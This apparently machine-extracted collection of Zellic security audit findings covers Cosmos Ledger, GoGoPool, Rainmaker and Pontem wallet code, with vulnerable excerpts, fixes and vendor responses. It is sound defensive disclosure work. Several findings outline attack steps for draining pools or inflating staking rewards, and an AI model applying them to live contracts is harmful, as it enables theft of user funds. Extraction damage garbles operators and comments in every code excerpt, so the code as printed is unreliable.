handleApdu(volatile uint32_t *flags, volatile uint32_t *tx, uint32_t rx) { uint16_t sw = 0; BEGIN_TRY { TRY { /)...)) Zellic Cosmos Network } CATCH(EXCEPTION_IO_RESET) { } THROW(EXCEPTION_IO_RESET); CATCH_OTHER(e) { switch (e & 0xF000) { case 0x6000: case APDU_CODE_OK: sw = e; break; default: sw = 0x6800 | (e & 0x7FF); break; } G_io_apdu_buffer[*tx] = sw >) 8; G_io_apdu_buffer[*tx + 1] = sw; *tx += 2; } FINALLY { } } END_TRY; } With just minor optimizations enabled, the compiler can be confused and optimize away variable modifications that do not seem to have any clear side effects. These bugs usually surface up near the end of the development cycle, when compiler opti- mizations are enabled to save on memory/flash footprint. The result could be that an actual error status is masked, and the application continues on like if it was successful. In the case of the crypto.c example, this would lead to the wrong public key being calculated in crypto_fillAddress(). Do also note that the entire APDU handler runs everything inside a big exception han- dler loop, which means it can return there at any point, and great care has to be taken when accessing globals there. An example where it could return early is in crypto.c It is recom- where the function cx_hash_sha256() is called outside of a try catch. Zellic Cosmos Network mended to use a function like cx_hash_no_throw instead there to avoid a very deep return back to the APDU handler. Mark variables that can be changed inside exception handlers with the volatile key- word. Use functions like cx_hash_no_throw(), then return gracefully on error, or wrap error-throwing functions like cx_hash_sha256() in TRY/EXCEPT blocks where used. This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit fb90358d. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.9 Incorrect size check when encoding Unicode", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The following code is part of the tx_display_translation function and converts a se- quence of Unicode codepoints into a string of escaped UTF-8 characters: *dst+) = '\\)'; ASSERT_PTR_BOUNDS(count, dstLen); uint8_t bytes_to_print = 8; int32_t swapped = ZX_SWAP(tmp_codepoint); if (tmp_codepoint > 0xFFFF) { *dst+) = 'U'; ASSERT_PTR_BOUNDS(count, dstLen); } else { *dst+) = 'u'; ASSERT_PTR_BOUNDS(count, dstLen); bytes_to_print = 4; swapped = (swapped >) 16) & 0xFFFF; } if (dstLen < bytes_to_print) { return parser_unexpected_value; } char buf[18] = {0}; array_to_hexstr(buf, sizeof(buf), (uint8_t *) &swapped, 8); for (int i = 0; i < bytes_to_print; i+)) { *dst+) = (buf[i] >) 'a' &) buf[i] <) 'z') ? (buf[i] - 32) : buf[i]; ASSERT_PTR_BOUNDS(count, dstLen); } The following size check does not take into account the number of bytes already writ- ten to the dst buffer: Zellic Cosmos Network if (dstLen < bytes_to_print) { return parser_unexpected_value; } The following line in the for loop when copying the buf buffer to the dst buffer would catch a buffer overflow: ASSERT_PTR_BOUNDS(count, dstLen); So, the buffer overflow would be unexploitable. We recommend changing the size check to account for the number of bytes already written to the buffer: if (dstLen < bytes_to_print) { if (dstLen < bytes_to_print + count) { return parser_unexpected_value; } This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 5a7c3cfe. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Return value of tx_display_translation is ignored", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The return value of tx_display_translation is ignored. The function returns a parse r_error_t if any abnormal behavior occurs: parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen); Errors may not be reported. Catch the return errors, if any, and handle them as desired. This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.11 Missing pointer bounds checks in tx_display_translation", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The following code is missing pointer bounds checks when writing the last two bytes: if (src[srcLen - 1] =) ' ' |) src[srcLen - 1] =) '@') { if (src[dstLen - 1] + 1 > dstLen) { return parser_unexpected_value; } *dst+) = '@'; } /) Terminate string *dst = 0; Also, the check inside the if statement seems to not do anything useful. It checks if the ASCII value of the last byte is at least 1 larger than the length of the destination buffer, and errors if it is. This is likely a coding mistake. There is a potential for a two-byte buffer overflow. However, the bytes are not fully controlled, and it is likely unexploitable. Add pointer bounds assertions: if (src[srcLen - 1] =) ' ' |) src[srcLen - 1] =) '@') { if (src[dstLen - 1] + 1 > dstLen) { return parser_unexpected_value; } ASSERT_PTR_BOUNDS(count, dstLen); *dst+) = '@'; } Zellic Cosmos Network /) Terminate string ASSERT_PTR_BOUNDS(count, dstLen); *dst = 0; This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 5a7c3cfe. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The transferAVAX function allows arbitrary transfers", + "labels": [ + "Zellic" + ], + "body": "Target: Vault.sol Category: Business Logic Likelihood: Medium Severity: High : High The transferAVAX function is used to perform transfers of avax between two registered contracts. function transferAVAX( string memory fromContractName, string memory toContractName, uint256 amount ) external onlyRegisteredNetworkContract { /) Valid Amount? if (amount =) 0) { revert InvalidAmount(); } /) Emit transfer event emit AVAXTransfer(fromContractName, toContractName, amount); /) Make sure the contracts are valid, will revert if not getContractAddress(fromContractName); getContractAddress(toContractName); /) Verify there are enough funds if (avaxBalances[fromContractName] < amount) { revert InsufficientContractBalance(); } /) Update balances avaxBalances[fromContractName] = avaxBalances[fromContractName] - amount; avaxBalances[toContractName] = avaxBalances[toContractName] + amount; } Zellic Multisig Labs The current checks ensure that the msg.sender is a registeredNetworkContract; how- ever, the function lacks a check on whether the msg.sender actually calls the function or not. Due to the fact that fromContractName can be an arbitrary address, a presumably ma- licious registeredNetwork contract can drain the avax balances of all the other regis- tered contracts. We recommend removing the fromContractName parameter altogether and ensuring that the funds can only be transferred by the caller of the function, msg.sender. function transferAVAX( /) @audit-info doesn't exist in rocketvault string memory fromContractName, string memory toContractName, uint256 amount ) external onlyRegisteredNetworkContract { /) Valid Amount? if (amount =) 0) { revert InvalidAmount(); } /) Emit transfer event emit AVAXTransfer(msg.sender, toContractName, amount); /) Make sure the contracts are valid, will revert if not getContractAddress(msg.sender); getContractAddress(toContractName); /) Verify there are enough funds if (avaxBalances[msg.sender] < amount) { revert InsufficientContractBalance(); } /) Update balances avaxBalances[msg.sender] = avaxBalances[msg.sender] - amount; avaxBalances[toContractName] = avaxBalances[toContractName] + amount; } Zellic Multisig Labs The issue has been fixed by Multisig Labs in commit 84211f. Zellic Multisig Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Ocyticus does not include the Staking pause", + "labels": [ + "Zellic" + ], + "body": "Target: Ocyticus, Staking Category: Business Logic Likelihood: Medium Severity: High : High The pauseEverything and resumeEverything functions are used to restrict access to important functions. function pauseEverything() external onlyDefender { ProtocolDAO dao = ProtocolDAO(getContractAddress(\u201cProtocolDAO\u201d)); dao.pauseContract(\u201cTokenggAVAX\u201d); dao.pauseContract(\u201cMinipoolManager\u201d); disableAllMultisigs(); } ///)) @notice Reestablish all contract's abilities ///)) @dev Multisigs will need to be enabled seperately, we dont know which ones to enable function resumeEverything() external onlyDefender { ProtocolDAO dao = ProtocolDAO(getContractAddress(\u201cProtocolDAO\u201d)); dao.resumeContract(\u201cTokenggAVAX\u201d); dao.resumeContract(\u201cMinipoolManager\u201d); } Apart from the TokenGGAvax and MinipoolManager, the Staking contract also makes use of the whenNotPaused modifier for its important functions. The paused state, will, however, not trigger at the same time with the pauseEverything call, since the Staking contract is omitted here, both for pausing and resuming. Should an emergency arise, pauseEverything will be called. In this case, Staking will be omitted, which could put user funds in danger. We recommend ensuring that the Staking contract is also paused in the pauseEveryt hing function as well as un-paused in the resumeEverything function. Zellic Multisig Labs function pauseEverything() external onlyDefender { ProtocolDAO dao = ProtocolDAO(getContractAddress(\u201cProtocolDAO\u201d)); dao.pauseContract(\u201cTokenggAVAX\u201d); dao.pauseContract(\u201cMinipoolManager\u201d); dao.pauseContract(\u201cStaking\u201d); disableAllMultisigs(); } ///)) @notice Reestablish all contract's abilities ///)) @dev Multisigs will need to be enabled seperately, we dont know which ones to enable function resumeEverything() external onlyDefender { ProtocolDAO dao = ProtocolDAO(getContractAddress(\u201cProtocolDAO\u201d)); dao.resumeContract(\u201cTokenggAVAX\u201d); dao.resumeContract(\u201cMinipoolManager\u201d); dao.resumeContract(\u201cStaking\u201d); } The issue has been fixed by Multisig Labs in commit dbc499. Zellic Multisig Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" + }, + { + "title": "3.3 The reward amount manipulation", + "labels": [ + "Zellic" + ], + "body": "Target: ClaimNodeOp.sol Category: Business Logic Likelihood: Medium Severity: High : High s A staker is eligible for the upcoming rewards cycle if they have staked their tokens for a long enough period of time. The reward amount is distributed in proportion to the amount of funds staked by the user from the total amount of funds staked by all users who claim the reward. But since the rewardsStartTime is the time of creation of only the first pool, and during the reward calculations all staked funds are taken into account, even if they have not yet been blocked and can be withdrawn, the attack described below is possible. The attack scenario: 1. An attacker stakes ggp tokens and creates a minipool with a minimum avaxAssi gnmentRequest value. 2. The multisig initiates the staking process by calling the claimAndInitiateStaking function. 3. Wait for the time of distribution of rewards. 4. Before the reward distribution process begins, the attacker creates a new minipool with the maximum avaxAssignmentRequest value. 5. Initiate the reward distribution process. 6. Immediately after that, the attacker cancels the minipool with cancelMinipool function before the claimAndInitiateStaking function call and returns most part of their staked funds. The attacker can increase their reward portion without actually staking their own funds. Take into account only the funds actually staked, or check that all minipools have been launched. Zellic Multisig Labs The issue has been fixed by Multisig Labs in commits c90b2f and f49931. Zellic Multisig Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Network registered contracts have absolute storage control", + "labels": [ + "Zellic" + ], + "body": "Target: Project-wide Category: Business Logic Likelihood: Low Severity: High : High The network-registered contracts have absolute control over the storage that all the contracts are associated with through the Storage contract. This is inherent due to the overall design of the protocol, which makes use of a single Storage contract eliminating the need of local storage. For that reason any registeredContract can update any storage slot even if it \u201cbelongs\u201d to another contract. modifier onlyRegisteredNetworkContract() { if (booleanStorage[keccak256(abi.encodePacked(\u201ccontract.exists\u201d, msg.sender))] =) false &) msg.sender !) guardian) { revert InvalidOrOutdatedContract(); } _; } /) ...)) function setAddress(bytes32 key, address value) external onlyRegisteredNetworkContract { addressStorage[key] = value; } function setBool(bytes32 key, bool value) external onlyRegisteredNetworkContract { booleanStorage[key] = value; } function setBytes(bytes32 key, bytes calldata value) external onlyRegisteredNetworkContract { bytesStorage[key] = value; } As an example, the setter functions inside the Staking contract have different restric- tions for caller (e.g., the setLastRewardsCycleCompleted function can be called only by ClaimNodeOp contract), but actually the setUint function from it may be called by any Zellic Multisig Labs RegisteredNetworkContract. We believe that in a highly unlikely case, a malicious networkRegistered contract could potentially alter the entire protocol Storage to their will. Additionally, if it were possible to setBool of an arbitrary address, then this scenario would be further exploitable by a malicious developer contract. We recommend paying extra attention to the registration of networkContracts, as well as closely monitoring where and when the setBool function is used, since the network registration is based on a boolean value attributed to the contract address. The issue has ben acknowledged by the Multisig Labs. Their official reply is repro- duced below: While it is true that any registered contract can write to Storage, we view all of the separate contracts comprising the Protocol as a single system. A single entity (either the Guardian Multisig or in future the ProtocolDAO) will be in control of all of the contracts. In this model, if an attacker can register a single malicious contract, then they are also in full control of the Protocol itself. Because all of the contracts are treated as a single entity, there is no additional security benefit to be gained by providing access controls between the various contract\u2019s storage slots. As a mitigation, the Protocol will operate several distributed Watchers that will continually scan the central Storage contract, and alert on any changes. Zellic Multisig Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Oracle may reflect an outdated price", + "labels": [ + "Zellic" + ], + "body": "Target: Oracle Category: Business Logic Likelihood: Medium Severity: Medium : Medium Some functions at protocol-level make use of the getGGPPriceInAvax. This getter re- trieves the price, which is set by the Rialto multisig. ///)) @notice Get the price of GGP denominated in AVAX ///)) @return price of ggp in AVAX ///)) @return timestamp representing when it was updated function getGGPPriceInAVAX() external view returns (uint256 price, uint256 timestamp) { price = getUint(keccak256(\u201cOracle.GGPPriceInAVAX\u201d)); if (price =) 0) { revert InvalidGGPPrice(); } timestamp = getUint(keccak256(\u201cOracle.GGPTimestamp\u201d)); } Due to the nature of on-chain price feeds, Oracles need to have an as-often-as- possible policy in regards to how often the price gets updated. For that reason, the reliance on the Rialto may be problematic should it fail to update the price often enough. Should the price be erroneous, possible front-runs may happen at the protocol level, potentially leading to a loss of funds on the user-end side. We recommend implementing a slippage check, which essentially does not allow a price to be used should it have been updated more than x blocks ago. The finding has been acknowledged by the Multisig Labs team. Their official reply is reproduced below: Zellic Multisig Labs The price of GGP is used in the Protocol to determine collateralization ratios for minipools as well as slashing amounts. If the price of GGP is unknown or out- dated, the protocol cannot operate. So our remediation for this will be to have a distributed set of Watchers that will Pause the Protocol if the GGP Price becomes outdated. At some point in the future the Protocol will use on-chain TWAP price oracles to set the GGP price. Zellic Multisig Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Fields are not reset exactly after their usage", + "labels": [ + "Zellic" + ], + "body": "Target: MinipoolManager Category: Business Logic Likelihood: Low Severity: Low : Low Due to the nature of the protocol, some fields are queried and used in one interme- diary state of the application and then reset in the last state of the application. As an example, see the avaxNodeOpRewardAmt value, which is queried and used in withdrawM inipoolFunds (which can only be called in the WITHDRAWABLE stage) function withdrawMinipoolFunds(address nodeID) external nonReentrant { int256 minipoolIndex = requireValidMinipool(nodeID); address owner = onlyOwner(minipoolIndex); requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished); setUint(keccak256(abi.encodePacked(\u201cminipool.item\u201d, minipoolIndex, \u201c.status\u201d)), uint256(MinipoolStatus.Finished)); uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked(\u201cminipool.item\u201d, minipoolIndex, \u201c.avaxNodeOpAmt\u201d))); uint256 avaxNodeOpRewardAmt = getUint(keccak256(abi.encodePacked(\u201cminipool.item\u201d, minipoolIndex, \u201c.avaxNodeOpRewardAmt\u201d))); uint256 totalAvaxAmt = avaxNodeOpAmt + avaxNodeOpRewardAmt; Staking staking = Staking(getContractAddress(\u201cStaking\u201d)); staking.decreaseAVAXStake(owner, avaxNodeOpAmt); Vault vault = Vault(getContractAddress(\u201cVault\u201d)); vault.withdrawAVAX(totalAvaxAmt); owner.safeTransferETH(totalAvaxAmt); } and then either reset in the recordStakingEnd function, to the new rounds\u2019 avaxNodeO pRewardAmt, or set to 0 in recordStakingError. The protocol\u2019s structure assumes that the way in which the states are transitioned Zellic Multisig Labs through is consistent. Should major changes occur in the future of the protocol, we suspect that some states that are presumably reset in an eventual state of the protocol may be omitted. This could in turn lead to unexpected consequences to the management of the minipool. We highly recommend that once important storage states are used, they should also be reset. In this way, future versions of the protocol will have a solid way of transi- tioning without requiring additional synchronization of storage state. The issue has ben acknowledged by the Multisig Labs. Their official reply is repro- duced below: The Protocol maintains some fields in Storage so that data such as avaxNodeO- pRewardAmt can be displayed to the end user. The fields will be reset if the user relaunches a minipool with the same nodeID again in the future. This is by design. Zellic Multisig Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Protocol owner can drain pools", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveRewardToken, DefinitiveStakingManager Category: Business Logic Likelihood: Low Severity: Critical : High Each staking manager has an associated token for accounting purposes. When a user accrues rewards, the corresponding tokens are minted. When a user withdraws to- kens, the contract uses the sum of their deposits and their reward token balance. From the withdraw function, /) Withdraw from definitive vault and include reward token balances uint256 underlyingAmount = withdrawFromDefinitive( _index, _lpTokenAmount + rewardTokenBalance ); emit Withdraw(msg.sender, underlyingAmount); /) Transfer to user IERC20 underlying = IERC20(underlyingTokenAddresses[_index]); underlying.approve(msg.sender, underlyingAmount); underlying.transfer(msg.sender, underlyingAmount); The reward token is deployed separately by the owner, who uses the admin role to grant the corresponding staking manager the ability to mint and burn tokens. This means that the owner retains the ability to arbitrarily mint and burn tokens. By granting the MINTER_ROLE to an account they control, the owner can 1. decrease the shares of other users and 2. increase their own shares. Zellic Rainmaker At any time, the owner can mint a large amount of tokens for themselves and with- draw the entire lpTokensStaked. As a consequence, in the event of a key compromise, all users would be exposed to potential loss of funds. Additionally, this requires un- necessary trust in the owner, which might discourage use of the protocol. We recommend deploying the token contract from the staking manager constructor and removing the owner\u2019s responsibility to grant roles. Alternatively, the ownership of the contract could be transferred to the staking manager. In commit 5a9a0e3f, Rainmaker fixed this issue by deploying the token contract di- rectly from the staking manager constructor. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Extraneous approval during withdrawal", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveStakingManager Category: Coding Mistakes Likelihood: Medium Severity: Critical : High At the end of the withdraw function, the tokens are transferred to the user: /) Transfer to user IERC20 underlying = IERC20(underlyingTokenAddresses[_index]); underlying.approve(msg.sender, underlyingAmount); underlying.transfer(msg.sender, underlyingAmount); However, because the transfer is done with transfer and not transferFrom or safeTr ansferFrom, the approval to the sender is not spent. Even after the payment, the user can still withdraw underlyingAmount of the token by calling transferFrom themselves. Definitive has the ability to withdraw tokens into the staking manager; the withdrawTo function is guarded with onlyWhitelisted. Thus, although no explicit functionality of the staking manager will leave the contract holding any funds, Definitive is allowed to perform such withdrawals and cause funds to be left in the staking manager contract. Further, future functionality may include the staking manager taking custody of tokens (such as fees) as well. In these cases, the extra approval will allow any user to steal rewards or future fees held by the staking manager. This could also be performed maliciously by Definitive. For instance, those with the ROLE_DEFINITIVE on the underlying strategy might be able to drain the contract by 1. depositing and withdrawing funds to increase unspent approval on the token, 2. calling withdrawTo on the underlying vault to withdraw funds into the staking manager, and 3. calling transferFrom on the underlying token into their own account. Zellic Rainmaker Remove the unnecessary call to underlying.approve. This issue has been acknowledged by Rainmaker, and a fix was implemented in com- mit 46249703. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.3 The underlying vault admin can drain pools", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveStakingManager Category: Coding Mistakes Likelihood: Low Severity: Critical : High In underlying Definitive pools, the deployer can configure permissions during deploy- ment. Importantly, a specific account is granted the DEFAULT_ADMIN_ROLE. In CoreAcce ssControl, constructor(CoreAccessControlConfig memory cfg) { /) admin _setupRole(DEFAULT_ADMIN_ROLE, cfg.admin); /) definitive admin _setupRole(ROLE_DEFINITIVE_ADMIN, cfg.definitiveAdmin); _setRoleAdmin(ROLE_DEFINITIVE_ADMIN, ROLE_DEFINITIVE_ADMIN); /) definitive for (uint256 i = 0; i < cfg.definitive.length; i+)) { _setupRole(ROLE_DEFINITIVE, cfg.definitive[i]); } _setRoleAdmin(ROLE_DEFINITIVE, ROLE_DEFINITIVE_ADMIN); /) clients - implicit role admin is DEFAULT_ADMIN_ROLE for (uint256 i = 0; i < cfg.client.length; i+)) { _setupRole(ROLE_CLIENT, cfg.client[i]); } } In OpenZeppelin\u2019s AccessControl, the user with DEFAULT_ADMIN_ROLE has the ability to manage other roles. This means that after deployment, the deployer is able to grant ROLE_CLIENT to other accounts. This allows them to steal funds by 1. granting that role to an account they control and Zellic Rainmaker 2. using that account to freely withdraw from the vault. This would expose all users to potential loss of funds if the admin were ever com- promised. It also requires unnecessary trust from users, which may discourage use of the protocol. We recommend that Rainmaker set a smart contract or the vault manager itself as the sole owner of the vault. This may look like a system for transferring ownership during deployment. Rainmaker added documentation in commit ac95d65e, indicating that this risk is mit- igated by granting underlying pool ownership to the Rainmaker multisig. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Missing slippage limits allow front-running", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveStakingManager Category: Business Logic Likelihood: Medium Severity: Medium : Medium During deposits and withdrawals, the staking manager interacts with the underlying vault for entry and exit. Those functions each have the parameter minAmount, which sets slippage limits for the staker actions. However, the minAmount is set to zero in all cases: /** * @dev Withdraw tokens from Definitive vault end-to-end (exit + withdraw) *) function withdrawFromDefinitive( uint8 _index, uint256 lpTokens ) private returns (uint256) { IERC20 underlying = IERC20(underlyingTokenAddresses[_index]); /) 1. Exit from the strategy via LP Tokens uint256 underlyingAmount = definitiveVault.exitOne(lpTokens, 0, _index); /) 2. Withdraw from the vault definitiveVault.withdraw(underlyingAmount, address(underlying)); return underlyingAmount; } These slippage limits are essential for mitigating front-running. Consider the _proces sExitPoolTransfers function in Balancer\u2019s PoolBalances contract: /** * @dev Transfers `amountsOut` to `recipient`, checking that they are within their accepted limits, and pays * accumulated protocol swap fees from the Pool. * Zellic Rainmaker * Returns the Pool's final balances, which are the current `balances` minus `amountsOut` and fees paid * (`dueProtocolFeeAmounts`). *) function _processExitPoolTransfers( address payable recipient, PoolBalanceChange memory change, bytes32[] memory balances, uint256[] memory amountsOut, uint256[] memory dueProtocolFeeAmounts ) private returns (bytes32[] memory finalBalances) { finalBalances = new bytes32[](balances.length); for (uint256 i = 0; i < change.assets.length; +)i) { uint256 amountOut = amountsOut[i]; _require(amountOut >) change.limits[i], Errors.EXIT_BELOW_MIN); ...)) } ...)) } If the minAmount (which becomes an element of change.limits) is set to zero, the slip- page check does nothing. This leaves users vulnerable to front-running. We recommend that the protocol provide users a way to specify minAmount. This issue has been acknowledged by Rainmaker, and a fix was implemented in com- mit 2c613c09. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Unenforced assumptions about Definitive behavior", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveRewardToken Category: Business Logic Likelihood: Medium Severity: Medium : Medium The staking manager makes some assumptions about underlying vault behavior that may not be true. For instance, it treats the LP token balance as increasing (except during withdrawals). However, Definitive is permitted to perform exits and decrease that balance. Violation of these assumptions might cause user funds to become locked. In staking manager withdrawal functions, withdrawals are always accompanied by exits: /** * @dev Withdraw tokens from Definitive vault end-to-end (exit + withdraw) *) function withdrawFromDefinitive( uint8 _index, uint256 lpTokens ) private returns (uint256) { IERC20 underlying = IERC20(underlyingTokenAddresses[_index]); /) 1. Exit from the strategy via LP Tokens uint256 underlyingAmount = definitiveVault.exitOne(lpTokens, 0, _index); /) 2. Withdraw from the vault definitiveVault.withdraw(underlyingAmount, address(underlying)); return underlyingAmount; } Since exiting and withdrawing are done together, there is no way to withdraw funds that are unstaked. Those with ROLE_DEFINITIVE have permissions to unstake funds into the underlying vault. Additionally, as mentioned in 3.2, they are able to withdraw vault funds into the staking manager too. Zellic Rainmaker These situations will create unstaked funds that cannot be withdrawn. As a mitigation, Rainmaker could provide users the ability to redeposit and reenter funds if they get stuck in either the underlying vault or the staking manager. Additionally, the vault is not immune to losses: it is possible for unfavorable conditions to cause a net decrease in LP token balance. This may result in shares that cannot be withdrawn. Rainmaker should document such risks. Rainmaker added functionality for restaking such funds in commit 25188ee8. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Excessive owner responsibility creates deployment risks", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveRewardToken, DefinitiveStakingManager Category: Code Maturity Likelihood: Low Severity: Medium : Medium Each staking manager, from construction, holds an array of underlying token addresses: /) Constructor constructor( address[] memory _underlyingAddresses, address _rewardTokenAddress, address _definitiveVaultAddress ) { underlyingTokenAddresses = _underlyingAddresses; rewardToken = DefinitiveRewardToken(_rewardTokenAddress); definitiveVault = IDefinitiveVault(_definitiveVaultAddress); } The precise order and contents of this array are extremely important because in depo sitIntoDefinitive, the amounts array must correspond exactly to both underlyingTok enAddresses and the token addresses in the vault. /** * @dev Deposit tokens into Definitive vault end-to-end (deposit + enter) * @return Staked amount (lpTokens) *) function depositIntoDefinitive( uint256 _underlyingAmount, uint8 _index ) private returns (uint256) { IERC20 underlying = IERC20(underlyingTokenAddresses[_index]); uint256[] memory amounts = new uint256[](underlyingTokenAddresses.length); amounts[_index] = _underlyingAmount; /) 1. Approve vault to spend underlying underlying.approve(address(definitiveVault), _underlyingAmount); Zellic Rainmaker /) 2. Deposit into the vault definitiveVault.deposit(amounts, underlyingTokenAddresses); /) 3. Enter into the strategy using 0 as minAmountsOut to get standard slippage return definitiveVault.enter(amounts, 0); } This means that during deployment, the owner is responsible for ensuring that _unde rlyingAddresses matches the vault\u2019s LP_UNDERLYING_TOKENS. Additionally, the owner needs to grant the staking manager the MINTER_ROLE in its cor- responding reward token. If the underlyingTokenAddresses array does not match LP_UNDERLYING_TOKENS, the pro- tocol may experience incorrect accounting or broken functionality. If the staking manager is not granted the required role, then deposits and withdrawals would eventually fail. Worse, if MINTER_ROLE on one token is mistakenly granted to multiple different staking managers, they could experience severe accounting issues and users may lose funds. We recommend that the protocol determine the underlying token addresses from the given vault as a single source of truth. The second issue is mitigated by the recom- mendation in 3.1. Rainmaker fixed these risks in 32bfa1fa and the remediations for 3.1. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Staking manager may become locked", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveStakingManager Category: Business Logic Likelihood: Low Severity: Medium : Medium The underlying vaults contain functionality that allows Definitive to pause contracts and the vault admin to unpause them. In BaseAccessControl, /** * @dev Inherited from CoreStopGuardian *) function enableStopGuardian() public override onlyAdmins { return _enableStopGuardian(); } /** * @dev Inherited from CoreStopGuardian *) function disableStopGuardian() public override onlyClientAdmin { return _disableStopGuardian(); } The STOP_GUARDIAN_ENABLED flag is checked on critical strategy functions. This means that the admin of the underlying strategy has the responsibility to prevent funds from being locked. In some unfavorable events (such as private key loss or compromise), staking manager mechanics may break. In addition to the recommendations in 3.3, we recommend providing users some con- trol over this \u201cunpause\u201d functionality \u2014 for example, by creating a smart contract, or modifying the staking manager, to act as the admin and allow users to unpause the contract. In case some pauses are necessary, this might include reasonable timelocks. Zellic Rainmaker In commit 6abfbd3d, Rainmaker documented that the admin role will be held by a multisig to mitigate centralization risk. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Potential centralization risk from fee configuration", + "labels": [ + "Zellic" + ], + "body": "Target: DefinitiveStakingManager Category: Business Logic Likelihood: N/A Severity: Informational : N/A Though the value is not yet used, the staking manager allows the owner to set feePct: /** * @dev Set fees *) function setFees(uint256 _feePct) external onlyOwner { feePct = _feePct; } If future additions to the protocol do use feePct, the owner would have the ability to make fees arbitrarily high \u2014 even above 100%. In general, this requires unneces- sary trust from users, which might discourage use of the protocol. In the case of key compromise, this would grant an attacker the ability to steal additional user funds. We recommend adding a reasonable upper limit (that is at least below 100%) on fee Pct if it is ever used. Alternatively, Rainmaker could instead implement a timelock for such configuration upgrades to allow users time to react to adverse changes. Rainmaker removed this functionality in 1d606d40. Zellic Rainmaker", + "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Malformed responses to the coinInfo API can soft lock the wallet", + "labels": [ + "Zellic" + ], + "body": "Target: src/data/queries/coinInfo.ts Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium A request is automatically sent to the following endpoint /v1/accounts/0x1/resource /0x1:)coin:)CoinInfo%3C0x1:)aptos_coin:)AptosCoin%3E during startup. The handler fails to check for errors, leading to a permanent soft lock when malformed data is returned. There are multiple scenarios where this could happen: RPC endpoint encounters an error RPC endpoint is malicious The requests are repeated, so the extension stays bricked as long as the returned data is malformed. async () => { return aptos.getAccountResource(extractAddressFromType(token as string), composeType(network.structs.CoinInfo, [token as string])) .then((value: AptosResource) => { const type = token as string; const decimals = +value.data.decimals; const name = value.data.name; const symbol = value.data.symbol; const alias = network.tokenAlias[token as string] ?) value.data.symbol; addTokenInfo({ name, symbol, decimals }); return { type, decimals, name, symbol, alias }; }) }, { ...))RefetchOptions.INFINITY, Zellic Pontem Technology Ltd. enabled: !)token } It leads to a permanent soft lock of the whole extension. It can be fixed by directly visiting chrome-extension:))/index.html#/settings/ and switching the network or reinstalling the extension. We recommend additional error handling when handling RPC responses. A fix was introduced in commit 9b4ad36e by incorporating error handling into the function, effectively preventing the wallet extension from experiencing a persistent, endless loop in the event of receiving malformed data. Zellic Pontem Technology Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem wallet - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Low password complexity threshold", + "labels": [ + "Zellic" + ], + "body": "Target: src/extension/modules/SignUp/SetPasswordForm/index.tsx Category: Coding Mistakes Likelihood: Medium Severity: Low : High The only requirement for the keyring password is that it needs to be at least six char- acters long. const validate = (values: SubmitPasswordFormValues) => { const errors: SubmitPasswordFormErrors = {}; if (!values.password) { errors.password = \u201cPassword required\u201d; } else if (values.password.length < MIN_PASSWORD_LENGTH) { errors.password = `Password length should contain minimum 